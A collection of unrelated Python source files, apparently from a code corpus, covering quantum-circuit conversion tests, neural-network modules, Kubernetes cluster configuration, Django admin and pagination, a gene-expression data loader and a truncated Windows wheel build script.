labels = tf.random.uniform(shape=[2, ], minval=0, maxval=1000, dtype=tf.int32)
labels = tf.one_hot(labels, depth=1000, axis=-1)
loss = distiller([img, labels])
"""
|
501841 | from tequila.circuit.pyzx import convert_to_pyzx, convert_from_pyzx
from tequila.circuit.gates import *
from tequila.simulators.simulator_api import simulate
from tequila import TequilaException
import numpy
import pytest
HAS_PYZX = True
try:
import pyzx
HAS_PYZX = True
except ImportError:
HAS_PYZX = False
@pytest.mark.skipif(not HAS_PYZX,
reason="Pyzx package not installed, test_convert_to_from_pyzx_simple not executed")
@pytest.mark.parametrize(
"tequila_circuit",
[
(X(target=3) + Y(target=2) + Z(target=1)),
(Rx(target=1, control=0, angle=5.67) + Ry(target=2, angle=0.98) + Rz(target=3, angle=1.67)),
(H(target=1) + H(target=1, control=0) + X(target=1) + Y(target=0) + Z(target=2) +
CX(target=3, control=0) + CY(target=4, control=2) + CZ(target=5, control=1) +
CNOT(target=3, control=0) + SWAP(first=0, second=3) +
S(target=1, control=0) + T(target=1, control=2))
]
)
def test_convert_to_from_pyzx_simple(tequila_circuit):
pyzx_circuit = convert_to_pyzx(tequila_circuit)
converted_circuit = convert_from_pyzx(pyzx_circuit)
wfn1 = simulate(tequila_circuit, backend="symbolic")
wfn2 = simulate(converted_circuit, backend="symbolic")
assert (numpy.isclose(wfn1.inner(wfn2), 1.0))
@pytest.mark.skipif(not HAS_PYZX,
reason="Pyzx package not installed, test_convert_to_from_pyzx not executed")
@pytest.mark.parametrize(
"variabs",
[
([2.8, 5.6, 7.6, 1.8, 4.98, 2.35, 3.12, 6.79, 0.12]),
([1.5, 3.7, 9.2, 3.1, 7.62, 1.98, 8.56, 2.97, 1.34]),
([0, 0, 0, 0, 0, 0, 0, 0, 0]),
([numpy.pi/12, numpy.pi, numpy.pi/3, numpy.pi/6, numpy.pi*0.95, numpy.pi/2, numpy.pi*2.3, numpy.pi/7, 0.56])
]
)
def test_convert_to_from_pyzx(variabs):
variables = {"ang1": variabs[0],
"ang2": variabs[1],
"ang3": variabs[2],
"ang4": variabs[3],
"ang5": variabs[4],
"ang6": variabs[5],
"ang7": variabs[6],
"ang8": variabs[7],
"ang9": variabs[8]}
tequila_circuit = H(target=[0, 1], control=2) + \
X(target=1) + \
Y(target=0) + \
Z(target=2) + \
CX(target=3, control=0) + \
CY(target=4, control=2) + \
CZ(target=5, control=1) + \
CNOT(target=3, control=0) + \
SWAP(first=0, second=3) + \
Rx(target=1, angle="ang1") + \
Ry(target=0, angle="ang2") + \
Rz(target=2, angle="ang3") + \
CRx(target=5, control=8, angle="ang4") + \
CRy(target=6, control=9, angle="ang5") + \
CRz(target=7, control=0, angle="ang6") + \
Phase(control=0, target=1, phi="ang7") + \
S(target=1, control=0) + \
T(target=1, control=2) + \
Rp(paulistring="Y(1)", angle="ang8") + \
ExpPauli(paulistring="Z(1)X(2)", control=0, angle="ang9") + \
Toffoli(target=2, first=4, second=3)
pyzx_circuit = convert_to_pyzx(tequila_circuit, variables=variables)
converted_circuit = convert_from_pyzx(pyzx_circuit)
wfn1 = simulate(tequila_circuit, backend="symbolic", variables=variables)
wfn2 = simulate(converted_circuit, backend="symbolic")
assert (numpy.isclose(wfn1.inner(wfn2), 1.0))
@pytest.mark.skipif(not HAS_PYZX,
reason="Pyzx package not installed, test_convert_to_from_pyzx_trotterized_gate not executed")
@pytest.mark.parametrize(
"string1,string2,angles,steps",
[
("1.0 X(1)Z(2) - 0.5 Z(3)X(4)", None, [numpy.pi/12], 1),
("1.0 X(1)Z(2) + 0.5 Z(3)X(4)", "1.0 Y(1)X(2) - 0.9 X(2)Z(3)", [5.6, numpy.pi], 1),
("1.5 Z(2)Z(4) + 0.8 Y(3)X(4)", None, [numpy.pi], 1)
]
)
def test_convert_to_from_pyzx_trotterized_gate(string1, string2, angles, steps):
variables = {"ang1": angles[0]} if string2 is None else {"ang1": angles[0], "ang2": angles[1]}
g1 = QubitHamiltonian.from_string(string1)
g2 = None if string2 is None else QubitHamiltonian.from_string(string2)
tequila_circuit = Trotterized(generators=[g1] if string2 is None else [g1, g2],
angles=["ang1"] if string2 is None else ["ang1", "ang2"],
steps=steps)
pyzx_circuit = convert_to_pyzx(tequila_circuit, variables=variables)
converted_circuit = convert_from_pyzx(pyzx_circuit)
wfn1 = simulate(tequila_circuit, backend="symbolic", variables=variables)
wfn2 = simulate(converted_circuit, backend="symbolic")
assert (numpy.isclose(wfn1.inner(wfn2), 1.0))
@pytest.mark.skipif(not HAS_PYZX,
reason="Pyzx package not installed, test_convert_from_pyzx_exception not executed")
def test_convert_from_pyzx_exception():
pyzx_circuit = pyzx.circuit.Circuit(qubit_amount=1)
tequila_circuit = QCircuit()
with pytest.raises(expected_exception=TequilaException,
match="Circuit provided must be of type pyzx.circuit.Circuit"):
convert_from_pyzx(tequila_circuit)
assert (isinstance(convert_from_pyzx(pyzx_circuit), QCircuit))
@pytest.mark.skipif(not HAS_PYZX,
reason="Pyzx package not installed, test_convert_to_from_pyzx_optimizing_circuit not executed")
@pytest.mark.parametrize(
"tequila_circuit,t_reduce",
[
(X(target=3) + Y(target=2) + Z(target=1), True),
(Rx(target=1, control=0, angle=5.67) + Ry(target=2, angle=0.98) + Rz(target=3, angle=1.67), False),
(H(target=1) + H(target=1, control=0) + X(target=1) + Y(target=0) + Z(target=2) +
CX(target=3, control=0) + CY(target=4, control=2) + CZ(target=5, control=1) +
CNOT(target=3, control=0) + SWAP(first=0, second=3) +
S(target=1, control=0) + T(target=1, control=2), True)
]
)
def test_convert_to_from_pyzx_optimizing_circuit(tequila_circuit, t_reduce):
pyzx_circuit = convert_to_pyzx(tequila_circuit)
pyzx_graph = pyzx_circuit.to_graph()
if t_reduce:
pyzx.teleport_reduce(pyzx_graph)
pyzx_circuit_opt = pyzx.Circuit.from_graph(pyzx_graph)
else:
pyzx.full_reduce(pyzx_graph)
pyzx_graph.normalize()
pyzx_circuit_opt = pyzx.extract_circuit(pyzx_graph.copy())
# compare_tensors returns True if pyzx_circuit and pyzx_circuit_opt
# implement the same circuit (up to global phase)
assert (pyzx.compare_tensors(pyzx_circuit, pyzx_circuit_opt))
# verify_equality return True if full_reduce() is able to reduce the
# composition of the circuits to the identity
assert (pyzx_circuit.verify_equality(pyzx_circuit_opt))
converted_circuit = convert_from_pyzx(pyzx_circuit_opt)
wfn1 = simulate(tequila_circuit, backend="symbolic")
wfn2 = simulate(converted_circuit, backend="symbolic")
assert (numpy.isclose(wfn1.inner(wfn2), 1.0))
|
501872 | from functools import partial
import numpy as np
import torch
import torch.nn as nn
# Taken from: https://github.dev/computational-imaging/ACORN/
class Sine(nn.Module):
def __init__(self, w0=30):
super().__init__()
self.w0 = w0
def forward(self, input):
return torch.sin(self.w0 * input)
def init_weights_zero(m):
if type(m) == nn.Linear:
if hasattr(m, 'weight'):
nn.init.zeros_(m.weight)
def init_weights_normal(m):
if type(m) == nn.Linear:
if hasattr(m, 'weight'):
nn.init.kaiming_normal_(m.weight, a=0.0, nonlinearity='relu', mode='fan_in')
def init_weights_xavier(m):
if type(m) == nn.Linear:
if hasattr(m, 'weight'):
nn.init.xavier_normal_(m.weight)
def sine_init(m, w0=30):
with torch.no_grad():
if hasattr(m, 'weight'):
num_input = m.weight.size(-1)
m.weight.uniform_(-np.sqrt(6 / num_input) / w0, np.sqrt(6 / num_input) / w0)
def first_layer_sine_init(m):
with torch.no_grad():
if hasattr(m, 'weight'):
num_input = m.weight.size(-1)
m.weight.uniform_(-1 / num_input, 1 / num_input)
class FCBlock(nn.Module):
'''A fully connected neural network that also allows swapping out the weights when used with a hypernetwork.
Can be used just as a normal neural network though, as well.
'''
def __init__(self, in_features, out_features, num_hidden_layers, hidden_features,
outermost_linear=True, nonlinearity='sine', weight_init=None, w0=30):
super().__init__()
self.first_layer_init = None
# Dictionary that maps nonlinearity name to the respective function, initialization, and, if applicable,
# special first-layer initialization scheme
nls_and_inits = {'sine': (Sine(w0=w0), partial(sine_init, w0=w0), first_layer_sine_init),
'relu': (nn.ReLU(inplace=True), init_weights_xavier, None)}
nl, nl_weight_init, first_layer_init = nls_and_inits[nonlinearity]
if weight_init is not None: # Overwrite weight init if passed
self.weight_init = weight_init
else:
self.weight_init = nl_weight_init
self.net = []
self.net.append(nn.Sequential(
nn.Linear(in_features, hidden_features), nl
))
for i in range(num_hidden_layers):
self.net.append(nn.Sequential(
nn.Linear(hidden_features, hidden_features), nl
))
if outermost_linear:
self.net.append(nn.Sequential(nn.Linear(hidden_features, out_features)))
else:
self.net.append(nn.Sequential(
nn.Linear(hidden_features, out_features), nl
))
self.net = nn.Sequential(*self.net)
if self.weight_init is not None:
self.net.apply(self.weight_init)
if first_layer_init is not None: # Apply special initialization to first layer, if applicable.
self.net[0].apply(first_layer_init)
def forward(self, rays):
B,C,N = rays.shape
rays = rays.permute(0,2,1) # B,N,C
rays = rays.reshape(B*N, C) # stack rays
output = self.net(rays)
output = output.reshape(B,N,1)
output = output.permute(0,2,1)
return output
class PositionalEncoding(nn.Module):
def __init__(self, num_encoding_functions=6, include_input=True, log_sampling=True, normalize=False,
input_dim=3, gaussian_pe=False, gaussian_variance=38):
super().__init__()
self.num_encoding_functions = num_encoding_functions
self.include_input = include_input
self.log_sampling = log_sampling
self.normalize = normalize
self.gaussian_pe = gaussian_pe
self.normalization = None
if self.gaussian_pe:
# this needs to be registered as a parameter so that it is saved in the model state dict
# and so that it is converted using .cuda(). Doesn't need to be trained though
self.gaussian_weights = nn.Parameter(gaussian_variance * torch.randn(num_encoding_functions, input_dim),
requires_grad=False)
else:
self.frequency_bands = None
if self.log_sampling:
self.frequency_bands = 2.0 ** torch.linspace(
0.0,
self.num_encoding_functions - 1,
self.num_encoding_functions)
else:
self.frequency_bands = torch.linspace(
2.0 ** 0.0,
2.0 ** (self.num_encoding_functions - 1),
self.num_encoding_functions)
if normalize:
self.normalization = torch.tensor(1/self.frequency_bands)
def forward(self, tensor) -> torch.Tensor:
r"""Apply positional encoding to the input.
Args:
tensor (torch.Tensor): Input tensor to be positionally encoded.
encoding_size (optional, int): Number of encoding functions used to compute
a positional encoding (default: 6).
include_input (optional, bool): Whether or not to include the input in the
positional encoding (default: True).
Returns:
(torch.Tensor): Positional encoding of the input tensor.
"""
encoding = [tensor] if self.include_input else []
if self.gaussian_pe:
for func in [torch.sin, torch.cos]:
encoding.append(func(torch.matmul(tensor, self.gaussian_weights.T)))
else:
for idx, freq in enumerate(self.frequency_bands):
for func in [torch.sin, torch.cos]:
if self.normalization is not None:
encoding.append(self.normalization[idx]*func(tensor * freq))
else:
encoding.append(func(tensor * freq))
# Special case, for no positional encoding
if len(encoding) == 1:
return encoding[0]
else:
return torch.cat(encoding, dim=1) # concat channels
class Conv2x(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=1, deconv=False, concat=True, bn=True, relu=True):
super().__init__()
self.concat = concat
self.conv1 = BasicConv(in_channels, out_channels, deconv, bn=bn, relu=True, kernel_size=2,
stride=2, padding=0)
if self.concat:
self.conv2 = BasicConv(out_channels * 2, out_channels, False, bn,
relu, kernel_size=kernel_size, stride=stride, padding=padding)
else:
self.conv2 = BasicConv(out_channels, out_channels, False, bn,
relu, kernel_size=kernel_size, stride=stride, padding=padding)
def forward(self, x, rem):
x = self.conv1(x)
if x.size() != rem.size():
raise Exception("X size", x.size(), "!= rem size", rem.size())
if self.concat:
x = torch.cat((x, rem), 1)
else:
x = x + rem
x = self.conv2(x)
return x
class BasicConv(nn.Module):
def __init__(self, in_channels, out_channels, deconv=False, bn=True, relu=True, **kwargs):
super().__init__()
self.relu = relu
self.use_bn = bn
if deconv:
self.conv = nn.ConvTranspose2d(in_channels, out_channels, bias=False, **kwargs)
else:
self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)
self.bn = nn.BatchNorm2d(out_channels)
self.leaky_relu = nn.LeakyReLU(0.2, inplace=False)
def forward(self, x):
x = self.conv(x)
if self.relu:
x = self.leaky_relu(x)
return x
|
501875 | from ipaddress import IPv4Address, IPv4Network
import jsonschema
import os
import subprocess
import yaml
import command
import resource
import template
import util
def get_project(create_dir_if_missing=False) -> str:
project_dir = os.getenv("HOMEWORLD_DIR")
if project_dir is None:
command.fail("no HOMEWORLD_DIR environment variable declared")
if not os.path.isdir(project_dir):
if create_dir_if_missing:
os.mkdir(project_dir)
else:
command.fail("HOMEWORLD_DIR (%s) is not a directory that exists" % project_dir)
return project_dir
def get_editor() -> str:
return os.getenv("EDITOR", "nano")
class Node:
VALID_NODE_KINDS = {"master", "worker", "supervisor"}
def __init__(self, config: dict, main_config: "Config"):
self.hostname = config["hostname"]
self.kind = config["kind"]
self.ip = IPv4Address(config["ip"])
self.main_config = main_config
if self.kind not in Node.VALID_NODE_KINDS:
raise Exception("invalid node kind: %s" % self.kind)
def __repr__(self):
return "%s node %s (%s)" % (self.kind, self.hostname, self.ip)
def external_dns_name(self):
return "%s.%s" % (self.hostname, self.main_config.external_domain)
SCHEMA = yaml.safe_load(resource.get("//spire/resources:setup-schema.yaml"))
class Config:
def __init__(self, kv: dict):
jsonschema.validate(kv, SCHEMA)
self.external_domain = kv["cluster"]["external-domain"]
self.internal_domain = kv["cluster"]["internal-domain"]
self.etcd_token = kv["cluster"]["etcd-token"]
self.realm = kv["cluster"]["kerberos-realm"]
self.mirror = kv["cluster"]["mirror"]
self.user_grant_domain = kv["cluster"]["user-grant-domain"]
self.user_grant_email_domain = kv["cluster"]["user-grant-email-domain"]
# the vlan on the trunk that each server needs to attach to in order to access the internet. "0" to represent
# that the server is either not on a vlan or that the VLAN is untrunked.
self.vlan = kv.get("vlan", 0)
self.cidr_nodes = IPv4Network(kv["addresses"]["cidr-nodes"])
self.cidr_pods = IPv4Network(kv["addresses"]["cidr-pods"])
self.cidr_services = IPv4Network(kv["addresses"]["cidr-services"])
self.service_api = IPv4Address(kv["addresses"]["service-api"])
self.service_dns = IPv4Address(kv["addresses"]["service-dns"])
if self.service_api not in self.cidr_services or self.service_dns not in self.cidr_services:
command.fail("in config: expected service IPs to be in the correct CIDR")
self.dns_upstreams = [IPv4Address(server) for server in kv["dns-upstreams"]]
self.dns_bootstrap = {hostname: IPv4Address(ip) for hostname, ip in kv["dns-bootstrap"].items()}
self.root_admins = kv["root-admins"]
self.nodes = [Node(n, self) for n in kv["nodes"]]
self.keyserver = None
for node in self.nodes:
if node.kind == "supervisor":
if self.keyserver is not None:
command.fail("in config: multiple supervisors not yet supported")
self.keyserver = node
# TODO(#371): make this configuration setting more explicit
def is_kerberos_enabled(self):
return len(self.root_admins) > 0
def has_node(self, node_name: str) -> bool:
return any(node.hostname == node_name for node in self.nodes)
def get_node(self, node_name: str) -> Node:
for node in self.nodes:
if node.hostname == node_name:
return node
command.fail("no such node: %s" % node_name)
def get_any_node(self, kind: str) -> Node:
for node in self.nodes:
if node.kind == kind:
return node
command.fail("cannot find any nodes of kind %s" % kind)
def get_fqdn(self, name: str) -> str:
hostname = name
if name.endswith("." + self.external_domain):
# strip external domain
hostname = name[:-(len(self.external_domain) + 1)]
elif name.endswith("." + self.internal_domain):
# strip internal domain
hostname = name[:-(len(self.internal_domain) + 1)]
if not self.has_node(hostname):
command.fail("no such node: %s" % name)
return hostname + "." + self.external_domain
@classmethod
def load_from_string(cls, contents: bytes) -> "Config":
return Config(yaml.safe_load(contents))
@classmethod
def load_from_file(cls, filepath: str) -> "Config":
return Config.load_from_string(util.readfile(filepath))
@classmethod
def get_setup_path(cls) -> str:
return os.path.join(get_project(), "setup.yaml")
@classmethod
def load_from_project(cls) -> "Config":
return Config.load_from_file(Config.get_setup_path())
def get_config() -> Config:
return Config.load_from_project()
def get_keyserver_domain() -> str:
config = Config.load_from_project()
return config.keyserver.hostname + "." + config.external_domain
def get_etcd_endpoints() -> str:
nodes = Config.load_from_project().nodes
return ",".join("https://%s:2379" % n.ip for n in nodes if n.kind == "master")
def get_apiserver_default_as_node() -> Node:
# TODO: this should be eliminated, because nothing should be specific to this one apiserver
config = Config.load_from_project()
apiservers = [node for node in config.nodes if node.kind == "master"]
if not apiservers:
command.fail("no apiserver to select, because no master nodes were configured")
return apiservers[0]
def get_apiserver_default() -> str:
return "https://%s:443" % get_apiserver_default_as_node().ip
def get_cluster_conf() -> str:
config = Config.load_from_project()
apiservers = [node for node in config.nodes if node.kind == "master"]
cconf = {"APISERVER": get_apiserver_default(),
"APISERVER_COUNT": len(apiservers),
"CLUSTER_CIDR": config.cidr_pods,
"CLUSTER_DOMAIN": config.internal_domain,
"DOMAIN": config.external_domain,
"ETCD_CLUSTER": ",".join("%s=https://%s:2380" % (n.hostname, n.ip) for n in apiservers),
"ETCD_ENDPOINTS": get_etcd_endpoints(),
"ETCD_TOKEN": config.etcd_token,
"SERVICE_API": config.service_api,
"SERVICE_CIDR": config.cidr_services,
"SERVICE_DNS": config.service_dns}
output = ["# generated by spire from setup.yaml\n"]
output += ["%s=%s\n" % kv for kv in sorted(cconf.items())]
return "".join(output)
def get_kube_cert_paths() -> (str, str, str):
project_dir = get_project()
return os.path.join(project_dir, "kube-access.key"),\
os.path.join(project_dir, "kube-access.pem"),\
os.path.join(project_dir, "kube-ca.pem")
def get_local_kubeconfig() -> str:
key_path, cert_path, ca_path = get_kube_cert_paths()
kconf = {"APISERVER": get_apiserver_default(),
"AUTHORITY-PATH": ca_path,
"CERT-PATH": cert_path,
"KEY-PATH": key_path}
return template.template("//spire/resources:kubeconfig-local.yaml", kconf)
def get_prometheus_yaml() -> str:
config = Config.load_from_project()
kcli = {"APISERVER": get_apiserver_default_as_node().ip,
"NODE-TARGETS": "[%s]" % ",".join("'%s.%s:9100'" % (node.hostname, config.external_domain)
for node in config.nodes),
"PULL-TARGETS": "[%s]" % ",".join("'%s.%s:9103'" % (node.hostname, config.external_domain)
for node in config.nodes if node.kind != "supervisor"),
"ETCD-TARGETS": "[%s]" % ",".join("'%s.%s:9101'" % (node.hostname, config.external_domain)
for node in config.nodes if node.kind == "master")}
return template.template("//spire/resources:prometheus.yaml", kcli)
@command.wrap
def populate() -> None:
"initialize the cluster's setup.yaml with the template"
setup_yaml = os.path.join(get_project(create_dir_if_missing=True), "setup.yaml")
if os.path.exists(setup_yaml):
command.fail("setup.yaml already exists")
resource.extract("//spire/resources:setup.yaml", setup_yaml)
print("filled out setup.yaml")
@command.wrap
def edit() -> None:
"open $EDITOR (defaults to nano) to edit the project's setup.yaml"
setup_yaml = os.path.join(get_project(), "setup.yaml")
if not os.path.exists(setup_yaml):
command.fail("setup.yaml does not exist (run spire config populate first?)")
subprocess.check_call([get_editor(), "--", setup_yaml])
@command.wrap
def print_cluster_conf() -> None:
"display the generated cluster.conf"
print(get_cluster_conf())
@command.wrap
def print_local_kubeconfig() -> None:
"display the generated local kubeconfig"
print(get_local_kubeconfig())
@command.wrap
def print_prometheus_yaml() -> None:
"display the generated prometheus.yaml"
print(get_prometheus_yaml())
def get_kube_spec_vars(extra_kvs: dict=None) -> dict:
config = Config.load_from_project()
kvs = {
"INTERNAL_DOMAIN": config.internal_domain,
"NETWORK": config.cidr_pods,
"SERVIP_API": config.service_api,
"SERVIP_DNS": config.service_dns,
# TODO: stop allowing use of just a single apiserver
"SOME_APISERVER": [node for node in config.nodes if node.kind == "master"][0].ip,
}
if extra_kvs:
kvs.update(extra_kvs)
return kvs
def get_single_kube_spec(path: str, extra_kvs: dict=None) -> str:
templ = resource.get(path).decode()
return template.yaml_template(templ, get_kube_spec_vars(extra_kvs))
main_command = command.Mux("commands about cluster configuration", {
"populate": populate,
"edit": edit,
"show": command.Mux("commands about showing different aspects of the configuration", {
"cluster.conf": print_cluster_conf,
"kubeconfig": print_local_kubeconfig,
"prometheus.yaml": print_prometheus_yaml,
}),
})
|
501890 | import wx
def main():
a = wx.PySimpleApp()
f = wx.Frame(None)
b = wx.Button(f, -1, 'showmodal')
f2 = wx.Dialog(f)
b2 = wx.Button(f2, -1, 'wut')
def onsubbutton(e):
print 'IsModal ', f2.IsModal()
print 'IsShown ', f2.IsShown()
b2.Bind(wx.EVT_BUTTON, onsubbutton)
def onbutton(e):
print 'onbutton'
print 'showing modal'
print 'result:', f2.ShowModal()
print 'done!'
b.Bind(wx.EVT_BUTTON, onbutton)
f.Show()
a.MainLoop()
if __name__ == '__main__':
main() |
501893 | from typing import List, Optional, Sequence
from draftjs_exporter.command import Command
from draftjs_exporter.constants import ENTITY_TYPES
from draftjs_exporter.dom import DOM
from draftjs_exporter.error import ExporterException
from draftjs_exporter.options import Options, OptionsMap
from draftjs_exporter.types import (
Block,
Element,
EntityDetails,
EntityKey,
EntityMap,
)
class EntityException(ExporterException):
pass
class EntityState(object):
__slots__ = (
"entity_options",
"entity_map",
"entity_stack",
"completed_entity",
"element_stack",
)
def __init__(
self, entity_options: OptionsMap, entity_map: EntityMap
) -> None:
self.entity_options = entity_options
self.entity_map = entity_map
self.entity_stack: List[EntityKey] = []
self.completed_entity: Optional[EntityKey] = None
self.element_stack: List[Element] = []
def apply(self, command: Command) -> None:
if command.name == "start_entity":
self.entity_stack.append(command.data)
elif command.name == "stop_entity":
expected_entity = self.entity_stack[-1]
if command.data != expected_entity:
raise EntityException(
f"Expected {expected_entity}, got {command.data}"
)
self.completed_entity = self.entity_stack.pop()
def has_entity(self) -> List[EntityKey]:
return self.entity_stack
def has_no_entity(self) -> bool:
return not self.entity_stack
def get_entity_details(self, entity_key: EntityKey) -> EntityDetails:
details = self.entity_map.get(entity_key)
if details is None:
raise EntityException(
f'Entity "{entity_key}" does not exist in the entityMap'
)
return details
def render_entities(
self, style_node: Element, block: Block, blocks: Sequence[Block]
) -> Element:
# We have a complete (start, stop) entity to render.
if self.completed_entity is not None:
entity_details = self.get_entity_details(self.completed_entity)
options = Options.get(
self.entity_options,
entity_details["type"],
ENTITY_TYPES.FALLBACK,
)
props = entity_details["data"].copy()
props["entity"] = {
"type": entity_details["type"],
"mutability": entity_details["mutability"]
if "mutability" in entity_details
else None,
"block": block,
"blocks": blocks,
"entity_range": {"key": self.completed_entity},
}
if len(self.element_stack) == 1:
children = self.element_stack[0]
else:
children = DOM.create_element()
for n in self.element_stack:
DOM.append_child(children, n)
self.completed_entity = None
self.element_stack = []
# Is there still another entity? (adjacent) if so add the current style_node for it.
if self.has_entity():
self.element_stack.append(style_node)
return DOM.create_element(options.element, props, children)
if self.has_entity():
self.element_stack.append(style_node)
return None
return style_node
|
501948 | import string
from ctypes import pointer
from tempfile import NamedTemporaryFile
from collections import defaultdict
from assertpy.assertpy import assert_that
from assertpy import assert_that
import numpy as np
from torch.utils.data import Dataset
from ffcv import DatasetWriter
from ffcv.fields import IntField, JSONField
from ffcv.fields.bytes import BytesDecoder
from ffcv.fields.basics import IntDecoder
from ffcv import Loader
options = list(string.ascii_uppercase + string.digits)
def generate_random_string(low, high):
length = np.random.randint(low, high)
content = ''.join(np.random.choice(options, size=length))
return content
class DummyDictDataset(Dataset):
def __init__(self, n_samples):
self.n_samples = n_samples
def __len__(self):
return self.n_samples
def __getitem__(self, index):
if index >= self.n_samples:
raise IndexError()
np.random.seed(index)
length = np.random.randint(5, 250)
content = np.random.randint(0, 256, size=(length,))
json_content = {}
for i in range(3):
json_content[generate_random_string(5, 10)] = generate_random_string(50, 250)
return index, json_content
def run_test(n_samples):
with NamedTemporaryFile() as handle:
name = handle.name
dataset = DummyDictDataset(n_samples)
writer = DatasetWriter(name, {
'index': IntField(),
'activations': JSONField()
}, num_workers=3)
writer.from_indexed_dataset(dataset)
loader = Loader(name, batch_size=3, num_workers=5,
pipelines={
'activation': [BytesDecoder()],
'index': [IntDecoder()]
}
)
ix = 0
for _, json_encoded in loader:
json_docs = JSONField.unpack(json_encoded)
for doc in json_docs:
ref_doc = dataset[ix][1]
assert_that(sorted(doc.items())).is_equal_to(sorted(ref_doc.items()))
ix += 1
def test_simple_dict():
run_test(32)
|
501998 | from django.contrib import admin
from .models import Blacklist, MessageLog
class BlacklistAdmin(admin.ModelAdmin):
list_display = ('email', 'type', 'created_at')
list_filter = ('type',)
search_fields = ('email',)
admin.site.register(Blacklist, BlacklistAdmin)
class MessageLogAdmin(admin.ModelAdmin):
list_display = ('email', 'result', 'created_at')
search_fields = ('email',)
admin.site.register(MessageLog, MessageLogAdmin)
|
502013 | import heapq
import collections
class Solution(object):
def findCheapestPrice(self, n, flights, src, dst, K):
graph = collections.defaultdict(dict)
for u, v, w in flights:
graph[u][v] = w
best = {}
pq = [(0, 0, src)]
while pq:
cost, k, place = heapq.heappop(pq)
if k > K+1 or cost > best.get((k, place), float('inf')): continue
if place == dst: return cost
for nei, wt in graph[place].iteritems():
newcost = cost + wt
if newcost < best.get((k+1, nei), float('inf')):
heapq.heappush(pq, (newcost, k+1, nei))
best[k+1, nei] = newcost
return -1
class Solution2(object):
def findCheapestPrice(self, n, flights, src, dst, K):
table = [[float('inf')] * n for _ in range(2)]
table[0][src] = 0
table[1][src] = 0
cur = 0
for i in range(K + 1):
pre = cur
cur = 1 - cur
for u, v, w in flights:
table[cur][v] = min(table[cur][v], table[pre][u] + w)
return table[cur][dst] if table[cur][dst] < float('inf') else -1 |
502082 | from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
def paginate(request, objects, ipp):
paginator = Paginator(objects, ipp)
page = request.GET.get('p')
try:
return paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
return paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
return paginator.page(paginator.num_pages)
|
502085 | from data import load_data_gse
from contextlib import closing
import os
import shutil
import numpy as np
import pandas as pd
import urllib.request as request
def processing_gse96058(clinical):
assert isinstance(clinical, pd.DataFrame), 'Invalid clinical type. It should be a pandas data frame.'
# cleaning clinical markers
clinical = clinical.replace({'NA': None, 'na': None})
del clinical['scan-b_external_id']
clinical['instrument_model'] = clinical['instrument_model'].replace({
'HiSeq 2000': 0, 'NextSeq 500': 1})
lymph_dummies = pd.get_dummies(clinical['lymph_node_group'])
lymph_dummies.columns = ['lymph_node_group_' + c for c in lymph_dummies.columns]
clinical = pd.concat([clinical, lymph_dummies], axis=1)
del clinical['lymph_node_group']
clinical['lymph_node_status'] = clinical['lymph_node_status'].replace({
'NodeNegative': 0, 'NodePositive': 1})
clinical['nhg'] = clinical['nhg'].replace({'G1': 1, 'G2': 2, 'G3': 3})
clinical['nhg_prediction_mgc'] = clinical['nhg_prediction_mgc'].replace({'G2': 2, 'G3': 3})
pam50_dummies = pd.get_dummies(clinical['pam50_subtype'])
pam50_dummies.columns = ['pam50_subtype_' + c for c in pam50_dummies.columns]
clinical = pd.concat([clinical, pam50_dummies], axis=1)
del clinical['pam50_subtype']
for c in clinical.columns:
clinical[c] = clinical[c].astype(float)
#
outcome = pd.DataFrame((clinical['overall_survival_days'] >=
clinical['overall_survival_days'].mean()).astype(float))
outcome.columns = ['risk_group']
# removing clinical markers invalid for
# building high and low risk predictors
for column in ['overall_survival_days', 'overall_survival_event']:
del clinical[column]
# removing estimated values
for c in clinical.columns:
if 'prediction' in c or 'model' in c:
del clinical[c]
return clinical, outcome
def load_data_gse96058(verbose=-1, read_as_ndarray=False):
"""
This method loads the data set of the project GSE96058 available at
https://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE96058.
:param verbose: (int) print logging messages if greater than 0 (default: -1)
:param read_as_ndarray: (bool) reads data as pandas data frame if false and
as numpy ndarray if True (default: False)
:return:
- clinical (pd.DataFrame): contains a set of clinical markers associated to lung patients,
- genes (pd.DataFrame): contains gene expression levels associated to lung patients,
- outcome (pd.DataFrame): contains one variable grouping patients in high (0) and low (1) risk
"""
clinical, _, outcome = load_data_gse('GSE96058', processing_gse96058, verbose, read_as_ndarray)
genes = get_gene_expressions(list(clinical.index))
return clinical, genes, outcome
def get_gene_expressions(columns):
base_path = os.path.join(os.path.dirname(__file__), 'GSE96058')
final_genes_filename = os.path.join(base_path, 'genes.csv')
if not os.path.exists(final_genes_filename):
if not os.path.exists(base_path):
os.makedirs(base_path)
filename = 'GSE96058_gene_expression_3273_samples_and_136_replicates_transformed.csv.gz'
ftp_url = 'ftp://ftp.ncbi.nlm.nih.gov/geo/series/GSE96nnn/GSE96058/suppl/' \
'GSE96058_gene_expression_3273_samples_and_136_replicates_transformed.csv.gz'
if not os.path.exists(os.path.join(base_path, filename)):
with closing(request.urlopen(ftp_url)) as r:
with open(os.path.join(base_path, filename), 'wb') as f:
shutil.copyfileobj(r, f)
genes = pd.read_csv(os.path.join(base_path, filename), sep=',')
genes = genes.rename(columns={'Unnamed: 0': 'ID'}).set_index('ID')
genes.columns = columns
if not os.path.isfile(final_genes_filename):
genes.to_csv(os.path.join(final_genes_filename))
else:
genes = pd.read_csv(final_genes_filename, sep=',', index_col='ID')
genes = genes.T
return genes.apply(lambda x: np.exp(x))
|
502099 | from subprocess import check_call
import os
import sys
import shutil
SCRIPT_DIR = os.path.dirname(__file__)
REPO_DIR = os.path.abspath(os.getcwd())
ROOT_DIR = os.path.abspath(os.path.join(REPO_DIR, '..'))
print('ROOT_DIR: %s' % ROOT_DIR)
print('REPO_DIR: %s' % REPO_DIR)
from wheel_build_utils import push_dir, push_env
from windows_build_common import DEFAULT_PY_ENVS, venv_paths
def build_wheels(py_envs=DEFAULT_PY_ENVS):
# Install Chemfiles
chfl_build_dir = os.path.join(ROOT_DIR, 'chfl-build')
os.mkdir(chfl_build_dir)
chfl_install_dir = os.path.join(ROOT_DIR, 'chfl')
check_call([
'cmake', '-DCMAKE_INSTALL_PREFIX:PATH=%s' % chfl_install_dir,
'-DCMAKE_POSITION_INDEPENDENT_CODE:BOOL=ON',
'-DCMAKE_BUILD_TYPE:STRING=Release',
'-G', 'Visual Studio 15 2017 Win64',
